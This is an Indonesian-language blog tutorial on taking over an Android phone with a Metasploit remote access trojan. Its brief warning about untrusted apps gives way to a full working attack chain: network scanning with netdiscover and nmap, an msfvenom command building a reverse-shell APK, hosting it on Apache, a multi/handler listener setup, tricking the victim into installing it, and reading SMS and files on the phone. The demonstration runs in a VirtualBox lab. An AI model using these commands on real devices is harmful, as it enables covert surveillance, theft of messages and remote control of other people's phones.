Di zaman sekarang sudah pasti manusia tidak lepas dari yang namanya gadget. Gadget yang paling banyak dipakai berdasarkan survei kebanyakan adalah Ponsel Android. Kita melakukan semua aktifitas dengan ponsel kita, mulai dari memperbarui status Whatsapp, bertukar informasi, menonton video secara online bahkan melakukan transaksi belanjapun sekarang sudah dipermudah dengan Android. Namun, perlu diketahui selalu ada celah bagi para penjahat untuk melakukan sabotase pada perangkat anda. Kita harus berhati - hati dalam mengunduh aplikasi yang tidak terpercaya terutama yang bukan melalui playstore.

Kali ini saya akan tunjukkan bagaimana caranya peretas bisa masuk dalam sebuah ponsel anda, melakukan modifikasi, mencuri data bahkan mengendalikan secara penuh ponsel anda dari jauh dengan menggunakan media Virus Trojan Horse. Sebuah perangkat lunak yang digunakan peretas dalam melakukan kendali seperti ini disebut dengan RAT (Remote Access Trojan). Peretas mengelabui pengguna dengan iming - iming rekayasa sosial, meninggalkan backdoor di dalam sistem ponsel anda.

Baik Pertama yang anda perlukan adalah sebuah PC dengan OS Linux pastinya yang sudah terinstall Metasploit, di sini saya menggunakan distro Parrot Security OS untuk keperluan Red Teaming. Anda bisa mengunduhnya dan mencarinya di Google dengan atau tanpa Torrent.

Dan sebagai contoh ponsel korban, saya menggunakan Android Lollipop yang terinstall di Mesin Virtualbox. Seperti yang terlihat di gambar.



Anggaplah ponsel korban dan Komputer si Hacker berada pada jaringan wifi yang sama. Lalu berikutnya dengan komputer si Hacker kita harus mengetahui berapa IP Private miliknya. Buka terminal lalu ketik perintah di bawah untuk mengetahui informasi IP.

ifconfig



Lalu berikutnya Hacker akan melakukan pengintaian dalam Jaringan wifi tersebut. Dengan mengetik perintah di bawah pada terminal.

netdiscover



Dari gambar di atas kita mendapatkan beberapa informasi dari proses pengintaian tadi. Yaitu 192.168.56.1 adalah IP dari router yang bertindak sebagai wifi, 192.168.56.100 dan 192.168.56.103 adalah perangkat yang terkoneksi pada Jaringan serta 192.168.56.102 adalah IP komputer si Hacker. Namun kita tidak tau mana IP ponsel Android target pada Jaringan Wifi, kita akan melakukan teknik fingerprinting untuk mengidentifikasi perangkat apa yang memiliki IP - IP tersebut. Kali ini kita akan menggunan tool Nmap untuk itu. Kita akan mengambil contoh IP yang terakhir untuk di Scan.

sudo nmap -v -O 192.168.56.103

 


Dari hasil scan yang tertera di gambar dapat kita simpulkan bahwa IP 192.168.56.103 adalah sebuah ponsel Android. Mengingat Android menggunakan kernel Linux, serta port 5555 digunakan aplikasi adb untuk debugging android melalui IP. Baik kita sudah mengetahui perangkat yang ingin di serang, selanjutnya adalah meng-generate Virus Trojan Horse nya.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 R > /var/www/html/virusandroid.apk


Perintah sudah dijalankan, virus sudah digenerate. Tampak dari perintah yang saya jalankan saya meletakkan generate virus pada web server milik komputer si Hacker yang menjalankan apache agar nantinya virus bisa di download oleh pemilik ponsel melalui web private si Hacker. Oke, selanjutnya karena kita sudah meletakkan virus pada folder web, kita harus memastikan layanan web kita berjalan.

sudo systemctl start apache2

sudo systemctl status apache2 



Baik di sini web kita sudah berjalan secara mulus. Langkah selanjutnya adalah mengaktifkan panel untuk remote virus yang akan kita kirimkan, yaitu panel Metasploit.

msfconsole



Setelah masuk selanjutnya kita harus memasukkan konfigurasi payload pada metasploit. Konfigurasi exploit :
use exploit/multi/handler

untuk konfigurasi payload :

set payload android/meterpreter/reverse_tcp

untuk konfigurasi IP, kita masukkan IP Komputer si Hacker :

set lhost 192.168.56.102

untuk konfigurasi Port :

set lport 4444

untuk menampilkan opsi :

show options



Dari tampilan di atas kita sudah menyetting konfigurasi dengan perintah yang benar. Selanjutnya adalah mengirimkan link ke Ponsel target untuk mendapatkan reverse shell, http://192.168.56.102/virusandroid.apk di browser HP korban. Sehingga nantinya di HP korban akan terunduh virus yang sudah kita kirimkan tadi seperti gambar di bawah.


Lalu Korban akan menginstall virus yang sudah kita kirimkan tadi seperti gambar di bawah.



Setelah aplikasi terinstall dan dibuka oleh Korban, maka langkah selanjutnya adalah menjalankan perintah exploit di Metasploit komputer Hacker. 


Tampak tulisan Meterpreter di gambar, itu menandakan kita sudah berhasil masuk pada Ponsel Target secara mulus. Selanjutnya kita hanya tinggal mengirimkan perintah - perintah untuk mengendalikan Ponsel Korban, pada contoh saya menjalankan perintah seperti gambar di bawah.





Saya menjalankan perintah ls untuk melihat direktori HP Target, serta dump_sms untuk melihat sms di HP Korban walaupun HP nya tidak memiliki SMS. Juga tampak sysinfo menerangkan sistem yang berhasil saya infiltrasi. Untuk perintah Metasploit lebih lanjut anda bisa menggunakan perintah help melihat daftar perintah, saya akan membahasnya di artikel berikutnya. Sekian bagaimana caranya menyadap ponsel dengan metasploit. Terima Kasih